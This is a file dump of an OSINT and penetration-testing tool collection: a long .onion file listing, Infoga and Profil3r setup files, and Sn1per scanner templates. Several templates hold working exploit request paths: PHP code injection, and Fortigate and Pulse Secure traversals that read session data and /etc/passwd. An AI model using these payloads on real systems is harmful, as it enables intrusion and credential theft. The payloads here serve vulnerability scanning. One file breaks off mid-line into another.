6kiujogtkmofnyaq.onion.json │ ├── 6kqjfpq7vizkvmla.onion.json │ ├── 6l4runjbnratbxbn.onion.json │ ├── 6l5qaelnyolwqdyq.onion.json │ ├── 6lmpkn6skbseqnh3.onion.json │ ├── 6loxxk6hwfkjpz6b.onion.json │ ├── 6lw4pg2wsy475d7q.onion.json │ ├── 6lyuawfjibnmlzqf.onion.json │ ├── 6mpj33zob2zmfqzn.onion.json │ ├── 6n4cuxee45ngwscx.onion.json │ ├── 6natm6uqztjwv4ix.onion.json │ ├── 6nefp5kt5yibi25s.onion.json │ ├── 6nkzmvk66p3yfx2y.onion.json │ ├── 6nlkmzpk4i56bu4d.onion.json │ ├── 6nnej5px2qq773vm.onion.json │ ├── 6ntk55xzuwh74ny6.onion.json │ ├── 6nv3ix7omzrty6cm.onion.json │ ├── 6o2n6kyvlycon5sp.onion.json │ ├── 6oa276dur6udwykp.onion.json │ ├── 6oa3qxoe6b3lrlcs.onion.json │ ├── 6oigxuhflvz73jy6.onion.json │ ├── 6onu2qrrdqo4cubp.onion.json │ ├── 6oxs5abbmzqvaa2a.onion.json │ ├── 6oyazscl7fw7tghe.onion.json │ ├── 6pcxzucuuhk4feed.onion.json │ ├── 6prwdgerblbtw4cs.onion.json │ ├── 6pxu46npnaea5ixh.onion.json │ ├── 6qcll3kmt7grddeo.onion.json │ ├── 6qoiqi6iu6zgpr3p.onion.json │ ├── 6r3pg2kyrn5e7jjd.onion.json │ ├── 6rc7ohky27smj637.onion.json │ ├── 6rf4j27gnmfqf4jk.onion.json │ ├── 6rq7jruebmjhwewc.onion.json │ ├── 6sfndqkrvxizazpb.onion.json │ ├── 6sgjmi53igmg7fm7.onion.json │ ├── 6sgjmit3nxzw2que.onion.json │ ├── 6si6n32yngq63b75.onion.json │ ├── 6soqvgf7mrjc7w3j.onion.json │ ├── 6szhphzy47jtlnzj.onion.json │ ├── 6tgi4q7lojfzqvsa.onion.json │ ├── 6timsegpome2vgse.onion.json │ ├── 6tkjalftqbs3n4li.onion.json │ ├── 6tonbm2p7afqasfc.onion.json │ ├── 6tosdj6xadudbxnu.onion.json │ ├── 6tv4bq3nthb5f7sh.onion.json │ ├── 6twrm4dqlxjwqfke.onion.json │ ├── 6ubux6ppafr24izl.onion.json │ ├── 6uufxh6kf3k572x3.onion.json │ ├── 6uvaexlsafk5hq2m.onion.json │ ├── 6v6q4eim5b2rrhd4.onion.json │ ├── 6va7dv7ohbz6ve6t.onion.json │ ├── 6w2nyvsf77q72ue6.onion.json │ ├── 6w6vcynl6dumn67c.onion.json │ ├── 6w76pyx7ccbvxryj.onion.json │ ├── 6wcopf3ros2kw3ra.onion.json │ ├── 6wcszw2gansh6gaa.onion.json │ ├── 6wgmhnbm3jaqghtl.onion.json │ ├── 6wzv5ynuqqcfehag.onion.json │ ├── 6xbcodgrkz3tffpv.onion.json │ ├── 6xukrlqedfabdjrb.onion.json │ ├── 6xydbbfysubflwhw.onion.json │ ├── 6y3222to7fcm3zjt.onion.json │ ├── 6z7afzp2u27imgd2.onion.json │ ├── 6zc6sejeho3fwrd4.onion.json │ ├── 6zdgh5a5e6zpchdz.onion.json │ ├── 6zjmuonbtcg7it5s.onion.json │ ├── 6zpnjnytdocvncyw.onion.json │ ├── 6zw2smzxahe7gvni.onion.json │ ├── 6zwctlqtpilbkl47.onion.json │ ├── 6zx6cxigcq7tjtue.onion.json │ ├── 726hbkwisbkdjivb.onion.json │ ├── 72ir4f6h5256op7o.onion.json │ ├── 72kkhupynpkdgevn.onion.json │ ├── 72m76fipi3rjpdxo.onion.json │ ├── 72o5x3purgqqu7dy.onion.json │ ├── 7334624537326475.onion.json │ ├── 73aiozxu75vfrkl5.onion.json │ ├── 73ch2ffs3l7jdbyy.onion.json │ ├── 73jjm4bwql44syeb.onion.json │ ├── 73lgals6htl7akfm.onion.json │ ├── 74i677egkh3zlk6r.onion.json │ ├── 74t3ljtwb6qgrhth.onion.json │ ├── 74xywh3le3xz4qhk.onion.json │ ├── 74ypjhoooiah25qc.onion.json │ ├── 74ypjqjwf6oejmax.onion.json │ ├── 755izzxlxk452qr2.onion.json │ ├── 756fgbb7ajstx3xy.onion.json │ ├── 75kcsobl45hwnfcj.onion.json │ ├── 75rmwrncczpso6du.onion.json │ ├── 76abljh5y7o2s6vn.onion.json │ ├── 76hrjuanhamaxqob.onion.json │ ├── 76qugh5bey5gum7l.onion.json │ ├── 76qugq4pb42lpgwx.onion.json │ ├── 76ssfjn22svo4vyl.onion.json │ ├── 76xkbxgntgu2uwxb.onion.json │ ├── 76xxdyqycmwirtot.onion.json │ ├── 77777j7cisvkojx7.onion.json │ ├── 77qhxp4gaszjrzot.onion.json │ ├── 7adopgjsyman2el2.onion.json │ ├── 7aiwdmr4oojlegdz.onion.json │ ├── 7ak32hdpibkyrir3.onion.json │ ├── 7alod7zpcztoxvwv.onion.json │ ├── 7aufqrdzn3nfeojl.onion.json │ ├── 7b3gsbbeulkslfr4.onion.json │ ├── 7bj6mdndskxndxli.onion.json │ ├── 7bkvkxtudyc7qwti.onion.json │ ├── 7blkm7heoz7pym3l.onion.json │ ├── 7bpctwm7axcaycud.onion.json │ ├── 7bpp64gz27coxhjg.onion.json │ ├── 7breynzf7uqkdu4k.onion.json │ ├── 7btxlh55l2hkk4gk.onion.json │ ├── 7bv363zon733tcww.onion.json │ ├── 7cbqhjnlkivmigxf.onion.json │ ├── 7cczzgsr22w7g4fr.onion.json │ ├── 7ch7h6oj3rjfmq7s.onion.json │ ├── 7cipfhqtvml25elz.onion.json │ ├── 7civh5rst6uhzhlh.onion.json │ ├── 7cq7n4phwjp4yq4f.onion.json │ ├── 7d5u6upbbltaztjx.onion.json │ ├── 7d7dkaulayebb3s3.onion.json │ ├── 7dd7ygnfudbmef66.onion.json │ ├── 7dgub4shbx45vnol.onion.json │ ├── 7dkkmufxsv4sgvjz.onion.json │ ├── 7e3y4emabflhgofh.onion.json │ ├── 7edaf2lzfxis2ff5.onion.json │ ├── 7efcfqiivl7fbfwm.onion.json │ ├── 7ejsgd236cj6cwhc.onion.json │ ├── 7ep7a5r4ezvioffh.onion.json │ ├── 7ep7ac3nsah3fc6l.onion.json │ ├── 7ep7acrkunzdcw3l.onion.json │ ├── 7ep7acrl4lcp3qes.onion.json │ ├── 7etxnv26hro7mmuu.onion.json │ ├── 7exlea5rskd5itvb.onion.json │ ├── 7exrd2eawwmfk56j.onion.json │ ├── 7exrd3euicrmrktu.onion.json │ ├── 7eyj4ymdodktjcve.onion.json │ ├── 7f7wsfwlgxih2aei.onion.json │ ├── 7faq6ixireuaiksj.onion.json │ ├── 7foxdbidl3agaalj.onion.json │ ├── 7g5bqm7htspqauum.onion.json │ ├── 7g5dfdihukca2cdn.onion.json │ ├── 7g7wr7rxvzxjjqja.onion.json │ ├── 7gcz7b6xkhddgx4a.onion.json │ ├── 7gelilpariscn7k2.onion.json │ ├── 7gfra7rc4pxifaip.onion.json │ ├── 7haz75ietrhjds3j.onion.json │ ├── 7hf4h3o7uhxbo7bg.onion.json │ ├── 7hk64iz2vn2ewi7h.onion.json │ ├── 7hst7dcpypl5tjcp.onion.json │ ├── 7i2c7jvhs7hxo4dm.onion.json │ ├── 7iaedcsvdqircbbq.onion.json │ ├── 7ialunk26nexs5bl.onion.json │ ├── 7iotvmzd35c4d2eu.onion.json │ ├── 7izeec6bqnn4rvuo.onion.json │ ├── 7j3ncmar4jm2r3e7.onion.json │ ├── 7jdq6w45ofig3vst.onion.json │ ├── 7jf42cs4eb2gyv2c.onion.json │ ├── 7jguhsfwruviatqe.onion.json │ ├── 7jkl2twalnpfrxia.onion.json │ ├── 7jv2q5zyz4ij6yuf.onion.json │ ├── 7jwxg5rakyfvikpi.onion.json │ ├── 7k7usqpjszn7ls4k.onion.json │ ├── 7ksyb2i7i5uvsu2n.onion.json │ ├── 7kuslhhtlooylgu4.onion.json │ ├── 7kuxpsodhm6kmeb6.onion.json │ ├── 7kvucw3xaostxoan.onion.json │ ├── 7l2xvzmbdmrx4mjl.onion.json │ ├── 7l5hqusd6xulhbe6.onion.json │ ├── 7lbc3gjafuckgwif.onion.json │ ├── 7lk3im6257tmmjv2.onion.json │ ├── 7ln4cubdfhs7tvtz.onion.json │ ├── 7lqjluz4i277wwls.onion.json │ ├── 7lvd7fa5yfbdqaii.onion.json │ ├── 7lxnndbgkehw76y7.onion.json │ ├── 7m6cjcer6won533c.onion.json │ ├── 7mbi2vgmpdpdz7gc.onion.json │ ├── 7ms4nnjikzfecmfc.onion.json │ ├── 7msnnd4jf32qsz5a.onion.json │ ├── 7n4p5o6vlkdiqiee.onion.json │ ├── 7o46qra2jkz3k3kx.onion.json │ ├── 7o6dcmajcps4tbjb.onion.json │ ├── 7o7rdspa5lxfqx2x.onion.json │ ├── 7on2ty7ztul5majv.onion.json │ ├── 7oottwclcrbxwam3.onion.json │ ├── 7orddpc7lgsdxvnw.onion.json │ ├── 7oxvuv2veve7br3l.onion.json │ ├── 7oycjoytfeejb4tp.onion.json │ ├── 7p353cj3lehqitsi.onion.json │ ├── 7p4bsyf77ovryr5v.onion.json │ ├── 7p4gfi2hfk2vj2pv.onion.json │ ├── 7p4phtqnrzrg5ju5.onion.json │ ├── 7p5svdslcdj2cgjp.onion.json │ ├── 7p6d2ctthaxcfzqj.onion.json │ ├── 7pd3i34noxnxolha.onion.json │ ├── 7puoojvjuzjhzf3u.onion.json │ ├── 7pvduwihntpla7yi.onion.json │ ├── 7pwhaqsxbjdj27gx.onion.json │ ├── 7pxhy63lo4pdhhh5.onion.json │ ├── 7q6fl6bh3njeevsj.onion.json │ ├── 7q6t6nafa4vraz5b.onion.json │ ├── 7qar3jcdhh53k5j2.onion.json │ ├── 7qhjzlgorkgaqcss.onion.json │ ├── 7qjvc3vlvzqv4frk.onion.json │ ├── 7qsdbetuja5wrdmr.onion.json │ ├── 7qxqu4zwdjxh33kr.onion.json │ ├── 7rkkc422cdjyurnm.onion.json │ ├── 7rmath4ro2of2a42.onion.json │ ├── 7rmatpsvygnpjhrt.onion.json │ ├── 7rpom2smywmsynlu.onion.json │ ├── 7s7mfviwqbg27p53.onion.json │ ├── 7sandjqne7uywp6s.onion.json │ ├── 7sfwrqmjhne57tgn.onion.json │ ├── 7sonhdf4csy6xi6j.onion.json │ ├── 7stieerozqdahz4o.onion.json │ ├── 7swajbltyibfgljq.onion.json │ ├── 7t4oyxikntymzevy.onion.json │ ├── 7tpbg2fjekm36q7e.onion.json │ ├── 7ueo7ahq2xlpwx7q.onion.json │ ├── 7uifkyord3spxfjb.onion.json │ ├── 7uj5ubxjzj2w3lqo.onion.json │ ├── 7ul635cwkib5anbw.onion.json │ ├── 7ulefmuz3jowwjb4.onion.json │ ├── 7uqfvhe2ovbj4ztt.onion.json │ ├── 7uvijlsswycvih2p.onion.json │ ├── 7v2l6wdfc35xqt4k.onion.json │ ├── 7vms4dp35rc4e27m.onion.json │ ├── 7vrl523532rjjznj.onion.json │ ├── 7vrl567orrjinkyk.onion.json │ ├── 7vx7qx2jyfdcvbqp.onion.json │ ├── 7vzw6qe5cdcbqbra.onion.json │ ├── 7w2rtz7rgfwj5zuv.onion.json │ ├── 7w65g63fgumvpuvd.onion.json │ ├── 7wabgn6xdxxqueu4.onion.json │ ├── 7wttmkfm5wsv4gj7.onion.json │ ├── 7wxgnvsy7fapoas3.onion.json │ ├── 7wynyfe33son6lhj.onion.json │ ├── 7x5rg44gkhtovwjt.onion.json │ ├── 7xhhjtcxwdfwkuma.onion.json │ ├── 7xnxdzyzegpsqus4.onion.json │ ├── 7xrwxoo673a37aac.onion.json │ ├── 7y26aczl3wdyujkc.onion.json │ ├── 7y6ajjamvqj4fyie.onion.json │ ├── 7ygiiyjkqzu62k4s.onion.json │ ├── 7ygrfzxxtjkwi2gy.onion.json │ ├── 7ymfzygewl4n6usp.onion.json │ ├── 7ywdkxkpi7kk55by.onion.json │ ├── 7z4nl4ojzggwicx5.onion.json │ ├── 7z7s2qezpj3rlrww.onion.json │ ├── 7zjlxleoekywde3j.onion.json │ ├── 7zzgqcrefl5e6d3g.onion.json │ ├── 7zzohostingx4mes.onion.json │ ├── a24m74cljydp33n3.onion.json │ ├── a2emrmdsprmm6t7i.onion.json │ ├── a2emrmdsprmm9t7i.onion.json │ ├── a2emrpdsprmm9t7i.onion.json │ ├── a2errmdsprmm6t7i.onion.json │ ├── a2jutl5hpza43yog.onion.json │ ├── a2kcinqz2lh4qdiq.onion.json │ ├── a2zxd3aqslvlhglk.onion.json │ ├── a325elf2xw4jatgm.onion.json │ ├── a36tkof7hujso6zv.onion.json │ ├── a3lpa4splyxeaqxe.onion.json │ ├── a3m3r6gwqwp5sdo5.onion.json │ ├── a3wycx7wtxb5xkra.onion.json │ ├── a4ad4ip2xzclh6fd.onion.json │ ├── a4d65p2eqparkdfb.onion.json │ ├── a4d7n2krthuyhd3y.onion.json │ ├── a4wzhhaakx4arl5i.onion.json │ ├── a4wzhhaukx4arl5i.onion.json │ ├── a4yedjgciupu7zzt.onion.json │ ├── a56e4bg7lsm6kfjh.onion.json │ ├── a5ec6f6zcxtudtch.onion.json │ ├── a5gvhrpulvq33b3q.onion.json │ ├── a5ldurk3q4w5ba3k.onion.json │ ├── a5ok374pjcq7bsyp.onion.json │ ├── a5pkunmiz362wiau.onion.json │ ├── a64r6szrpegnggoj.onion.json │ ├── a6c6l67xepnlg2lj.onion.json │ ├── a6zakk4fegj3pql5.onion.json │ ├── a77lxvs47g6mtehx.onion.json │ ├── a7aaaxaharakagan.onion.json │ ├── a7fbqyhnab7xm7lp.onion.json │ ├── a7ucvawr6xkb2qpt.onion.json │ ├── aaaaabbbbbiabh6y.onion.json │ ├── aaaajqiyzj34rhjm.onion.json │ ├── aaaajqlyzj34rhjm.onion.json │ ├── aaouiyrt23njidey.onion.json │ ├── aarfjuyfvl7kgrr3.onion.json │ ├── aat3z54fx63lpnpg.onion.json │ ├── aaz4bexuanmn7sbv.onion.json │ ├── ab4nuabx5hq6rc4x.onion.json │ ├── ab6bp37gsthaqsc3.onion.json │ ├── abbujjh5vqtq77wg.onion.json │ ├── abbx4tqgfr3sy222.onion.json │ ├── abfze4omo4afbsft.onion.json │ ├── abigispddied4mec.onion.json │ ├── abkjckdgoabr7bmm.onion.json │ ├── abox4lzdxbj5qa65.onion.json │ ├── abraxa4n3q5dnosi.onion.json │ ├── abraxasamfhuy2lj.onion.json │ ├── abraxasdegupusel.onion.json │ ├── abraxasgacelesox.onion.json │ ├── abraxasjhcybfhxh.onion.json │ ├── absolem6indyslug.onion.json │ ├── absolqctjjqeqp4q.onion.json │ ├── abwzfrbtnhjm6khx.onion.json │ ├── abyssopvszauhu4t.onion.json │ ├── abyssopyps3z4xof.onion.json │ ├── ac4jrkjk4ialqkoh.onion.json │ ├── ac6kzts6mauq2gfs.onion.json │ ├── ac7zotau5hzzciun.onion.json │ ├── acabtd4btrxjjrvr.onion.json │ ├── acdagpb5cqdhrdjk.onion.json │ ├── aceat45q47wrpco5.onion.json │ ├── achzkqvsdq5vspx5.onion.json │ ├── acidabb2dyfkjn4u.onion.json │ ├── acidabb2e4cufpby.onion.json │ ├── acropol3iwrcmtqg.onion.json │ ├── acropol4ti6ytzeh.onion.json │ ├── acropol5gty4xilh.onion.json │ ├── acropolfo4upbqxc.onion.json │ ├── acropolhwczbgbkh.onion.json │ ├── acropolism5eiein.onion.json │ ├── acteamygnwgs7zpt.onion.json │ ├── ad3sghv2p7ipjmuc.onion.json │ ├── ad3wd3npbamzr5t5.onion.json │ ├── ad52wtwp2goynr3a.onion.json │ ├── addrupldqjzgpriy.onion.json │ ├── adkjpsmg74jexhnk.onion.json │ ├── admxwbjltdyoerht.onion.json │ ├── adrenlfztn4zuk7k.onion.json │ ├── adrhq2rbf7llpoys.onion.json │ ├── adrsucfhkj6lziax.onion.json │ ├── aegshqxngerfziqq.onion.json │ ├── aej45satcnyk7hgd.onion.json │ ├── aem665j5yko46o2n.onion.json │ ├── aeriszyr4wbpvuo2.onion.json │ ├── aet7lmoi4advnqhy.onion.json │ ├── aeutwmrzlllw7jag.onion.json │ ├── aewfdl3tyohbcenp.onion.json │ ├── affiivrakpu7ltz7.onion.json │ ├── afj7yx323f44oxcg.onion.json │ ├── afon76in47gulb4l.onion.json │ ├── afpcbwv4ynjhrzes.onion.json │ ├── agape3brimud5fk6.onion.json │ ├── age62hfu5rtptkg4.onion.json │ ├── agenttoe2dlvxdei.onion.json │ ├── agirnygw2gthk2c7.onion.json │ ├── agjo6d3l4ca4pmfb.onion.json │ ├── agjz2pjpagqsm2cg.onion.json │ ├── aglrnbqvlhepxzgu.onion.json │ ├── agorahbslwe4hcsv.onion.json │ ├── agorahlxgzy7p54m.onion.json │ ├── agorahoo3ctilypp.onion.json │ ├── agorahoo3yigtggf.onion.json │ ├── agorahooawayyfoe.onion.json │ ├── agorahoob6wgtbre.onion.json │ ├── agxr7olxktjre7hn.onion.json │ ├── ah5dm66duazqkz6h.onion.json │ ├── ahctf3ks4lgwdsrq.onion.json │ ├── ahhldsqhacklabfw.onion.json │ ├── ahmiafi77rhsbbyb.onion.json │ ├── ahmygmocjnzstr43.onion.json │ ├── ahtluq2dyofh5mwr.onion.json │ ├── aiehehuydsmd7rki.onion.json │ ├── aigglrwdkxn5hdjz.onion.json │ ├── aim7jnedzsbo7xar.onion.json │ ├── aiywvm3uqfoo6uiq.onion.json │ ├── ajj3a7gfmgwmhhoz.onion.json │ ├── ajqaivfxtqy3fdlr.onion.json │ ├── ajr4usluppzz5qgt.onion.json │ ├── ak2uqfavwgmjrvtu.onion.json │ ├── ak47ecmbiod4sjb4.onion.json │ ├── ak6uodhvrvgfkvzi.onion.json │ ├── aka6uuhimtblhcdu.onion.json │ ├── akmb7t5w56jcfgwf.onion.json │ ├── akpvgkxxzltnp3ac.onion.json │ ├── aksyshheciib4oor.onion.json │ ├── akvibirqlzmevbbb.onion.json │ ├── akvilonom27p5hvb.onion.json │ ├── al2ecet5b2x52ho2.onion.json │ ├── albinxxrvcqoq4cz.onion.json │ ├── alc3geathegs5qpb.onion.json │ ├── alextwvynokqdyfi.onion.json │ ├── algorthpzub5yu7m.onion.json │ ├── allcardsktnylnfd.onion.json │ ├── alldumps2wtdp6yo.onion.json │ ├── alliancepycqnioz.onion.json │ ├── allium637hr5ncbi.onion.json │ ├── allyobjuv5n7y7jq.onion.json │ ├── allyour4nert7pkh.onion.json │ ├── alpaca7bcqv2rnu3.onion.json │ ├── alphabay4g5kjmwq.onion.json │ ├── alphabay54qdm7bn.onion.json │ ├── alphabay6vdkh2it.onion.json │ ├── alphabaycqror23r.onion.json │ ├── alphabayid7qjj3x.onion.json │ ├── alphabaylt3k3knc.onion.json │ ├── alphabaytqfppjgn.onion.json │ ├── alphabaywyjrktqn.onion.json │ ├── alphabayxsxlxeaz.onion.json │ ├── anthill375i7phva.onion.json │ ├── anthilledowsdpbr.onion.json │ ├── anthillezomqyirs.onion.json │ ├── anthillriewzml5j.onion.json │ ├── anthillrixdtwsot.onion.json │ ├── antifa.torpress2sarn7xw.onion.json │ ├── antigoveaomplkle.onion.json │ ├── antiscambrasil.torpress2sarn7xw.onion.json │ ├── aocjjk2w7i3rtwvw.onion.json │ ├── aoidixkqg55t4uev.onion.json │ ├── aoms2d5iejlju74i.onion.json │ ├── aoqjy6yyjklitxn6.onion.json │ ├── aor7exhyqwdm7nbu.onion.json │ ├── ap4aiw7wtwcaxe6m.onion.json │ ├── apacheez5mgmyijr.onion.json │ ├── apbgtrpiogwbf3ke.onion.json │ ├── apbv6itrkcr7k3ny.onion.json │ ├── apchatxshsnyi6s3.onion.json │ ├── apfront5qxkubpis.onion.json │ ├── api.gcvqzacplu4veul4.onion.json │ ├── api.gcvqzadkkudbza6f.onion.json │ ├── apkx44pmf7fyd63e.onion.json │ ├── apple.onion.json │ ├── apple26lzon6k5eo.onion.json │ ├── apple5e3lqymppzp.onion.json │ ├── apple7xy753qjdlf.onion.json │ ├── applebay75oi4iqj.onion.json │ ├── appleewsd2demx6c.onion.json │ ├── applesavbbloawcm.onion.json │ ├── applesavvulpl4ft.onion.json │ ├── applesf6emggp2pz.onion.json │ ├── appleze2rg3on25s.onion.json │ ├── apply2hae44hx37c.onion.json │ ├── apvc24autvavxuc6.onion.json │ ├── apzedndpiiixw7hk.onion.json │ ├── aqdlgvf4jqm4gnn6.onion.json │ ├── aqsp3j4vkcm5toz3.onion.json │ ├── ar3ubs6cg6an4ylt.onion.json │ ├── arcadian4nxs3pjr.onion.json │ ├── arcanum.torpress2sarn7xw.onion.json │ ├── arch3rsecgjqcmjb.onion.json │ ├── archivnsjgighrik.onion.json │ ├── archmail5fanreo5.onion.json │ ├── argent2ejwtzecow.onion.json │ ├── arhivachovtj2jrp.onion.json │ ├── armor64oojvty6ob.onion.json │ ├── armorykr2fqsulxk.onion.json │ ├── armoryohajjhou5m.onion.json │ ├── armoryohm73n2hvb.onion.json │ ├── armoryuqhydqmpro.onion.json │ ├── armoryx7kvdq3jds.onion.json │ ├── armsmeo3z5kuf2dp.onion.json │ ├── armsmhmd4c3hb5xu.onion.json │ ├── armsmhmdpqw7yeym.onion.json │ ├── armu2i2o5wcjljja.onion.json │ ├── arts3yclvwxdzlbr.onion.json │ ├── artsmankindxgcv5.onion.json │ ├── artsmanvesyngaz5.onion.json │ ├── arukniwn2x7cjk47.onion.json │ └── as4umis3k62ntaa4.onion.json ├── onionrunner.py └── serversetup.sh └── wix └── wixminer.py /InFoGa/Infoga/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:alpine 2 | 3 | ENV APP_HOME /usr/src/app 4 | 5 | WORKDIR $APP_HOME 6 | ADD . $APP_HOME 7 | 8 | RUN python setup.py install 9 | RUN chmod +x infoga.py 10 | 11 | ENTRYPOINT ["python","infoga.py"] 12 | -------------------------------------------------------------------------------- /InFoGa/Infoga/requirements.txt: -------------------------------------------------------------------------------- 1 | colorama 2 | requests 3 | urllib3 4 | -------------------------------------------------------------------------------- /InFoGa/Infoga/screen/image_5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kal1gh0st/OSINT/0416bcf6de1195cba2c827318895f693f0ef987d/InFoGa/Infoga/screen/image_5.png -------------------------------------------------------------------------------- /InFoGa/Infoga/screen/main.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kal1gh0st/OSINT/0416bcf6de1195cba2c827318895f693f0ef987d/InFoGa/Infoga/screen/main.png -------------------------------------------------------------------------------- /InFoGa/Infoga/screen/run_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kal1gh0st/OSINT/0416bcf6de1195cba2c827318895f693f0ef987d/InFoGa/Infoga/screen/run_2.png -------------------------------------------------------------------------------- /InFoGa/Infoga/setup.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name : Infoga - Email OSINT 5 | # @url : http://github.com/m4ll0k 6 | # @author : Momo Outaadi (m4ll0k) 7 | 8 | from setuptools import setup 9 | 10 | setup( 11 | name='infoga', 12 | 13 | version='0.1.5', 14 | description='Email OSINT', 15 | url='https://github.com/m4ll0k', 16 | 17 | author = 'Momo (m4ll0k) Outaadi', 18 | author_email='m4ll0k@protonmail.com', 19 | license='GPLv3', 20 | 21 | install_requires = ['colorama','requests','urllib3'], 22 | console =['infoga.py'], 23 | ) -------------------------------------------------------------------------------- /OnionSearch/onionsearch/__init__.py: -------------------------------------------------------------------------------- 1 | from onionsearch.core import * 2 | -------------------------------------------------------------------------------- /Profil3r/profil3r.py: -------------------------------------------------------------------------------- 1 | import sys 2 | from itertools import chain, combinations 3 | from profil3r.core import Core 4 | from profil3r.core.colors import Colors 5 | from multiprocessing import Process 6 | 7 | CONFIG = './config.json' 8 | 9 | profil3r = Core(CONFIG, sys.argv[1:]).run() -------------------------------------------------------------------------------- /Profil3r/profil3r/core/_logo.py: -------------------------------------------------------------------------------- 1 | from profil3r.core.colors import Colors 2 | 3 | def print_logo(self): 4 | print(Colors.OKGREEN + Colors.BOLD + ''' 5 | ____ _____ _______ 6 | / __ \_________ / __(_) /__ /_____ 7 | / /_/ / ___/ __ \/ /_/ / / /_ /dev/null 7 | source /root/.sniper.conf 2> /dev/null 8 | source /root/.sniper_api_keys.conf 2> /dev/null 9 | 10 | MESSAGE="$1" 11 | 12 | if [ "$MESSAGE" == "postfile" ]; then 13 | FILENAME="$2" 14 | curl -F "file=@$FILENAME" -F "initial_comment=$FILENAME" -F "channels=$SLACK_CHANNEL" -H "Authorization: Bearer $SLACK_API_TOKEN" https://slack.com/api/files.upload 2> /dev/null > /dev/null 15 | else 16 | curl -X POST -H 'Content-type: application/json' --data "{\"text\":\"$MESSAGE\"}" $SLACK_WEBHOOK_URL 2> /dev/null > /dev/null 17 | fi 18 | -------------------------------------------------------------------------------- /Sn1per/bin/slurp.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kal1gh0st/OSINT/0416bcf6de1195cba2c827318895f693f0ef987d/Sn1per/bin/slurp.zip -------------------------------------------------------------------------------- /Sn1per/loot/README.md: -------------------------------------------------------------------------------- 1 | # Sn1per - Automated Pentest Recon Scanner 2 | ![alt tag](https://github.com/1N3/Sn1per/blob/master/Sn1per-logo.png) 3 | -------------------------------------------------------------------------------- /Sn1per/sn1per.desktop: -------------------------------------------------------------------------------- 1 | [Desktop Entry] 2 | Name=sn1per 3 | Encoding=UTF-8 4 | Exec=bash-wrapper "sudo sniper" 5 | Icon=/usr/share/pixmaps/sn1per.png 6 | StartupNotify=false 7 | Terminal=true 8 | Type=Application 9 | Categories=08-exploitation-tools;02-vulnerability-analysis;01-info-gathering; 10 | X-Kali-Package=sn1per 11 | Comment= 12 | Path= 13 | -------------------------------------------------------------------------------- /Sn1per/sn1per.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kal1gh0st/OSINT/0416bcf6de1195cba2c827318895f693f0ef987d/Sn1per/sn1per.png -------------------------------------------------------------------------------- /Sn1per/templates/active/AWS_S3_Public_Bucket_Listing.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='AWS S3 Public Bucket Listing' 3 | URI='' 4 | METHOD='GET' 5 | MATCH="listbucket" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/ApPHP_MicroBlog_Remote_Code_Execution_Vulnerability.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='ApPHP MicroBlog Remote Code Execution Vulnerability' 3 | URI='/index.php?b);phpinfo();echo(base64_decode('T3BlblZBUwo')=/' 4 | METHOD='GET' 5 | MATCH="phpinfo\(\)" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Apache_Solr_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Apache Solr Detected' 3 | URI='' 4 | METHOD='GET' 5 | MATCH="Solr\ Admin" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/Apache_Tomcat_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Apache Tomcat Detected' 3 | URI='/404_DOES_NOT_EXIST' 4 | METHOD='GET' 5 | MATCH="Apache\ Tomcat" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/AvantFAX_LOGIN_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='AvantFAX LOGIN Detected' 3 | URI='' 4 | METHOD='GET' 5 | MATCH="AvantFAX\ LOGIN" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2018-13379_-_Fortigate_Pulse_Connect_Secure_Directory_Traversal.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2018-13379 - Fortigate Pulse Connect Secure Directory Traversal' 3 | URI='/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession' 4 | METHOD='GET' 5 | MATCH='\.\.\.\.\.\.\.\.\.\.\.\.\.' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /Sn1per/templates/active/CVE-2019-11510_-_Pulse_Connect_Secure_SSL_VPN_Arbitrary_File_Read.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2019-11510 - Pulse Connect Secure SSL VPN Arbitrary File Read' 3 | URI='/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/' 4 | METHOD='GET' 5 | MATCH="root:*:" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- 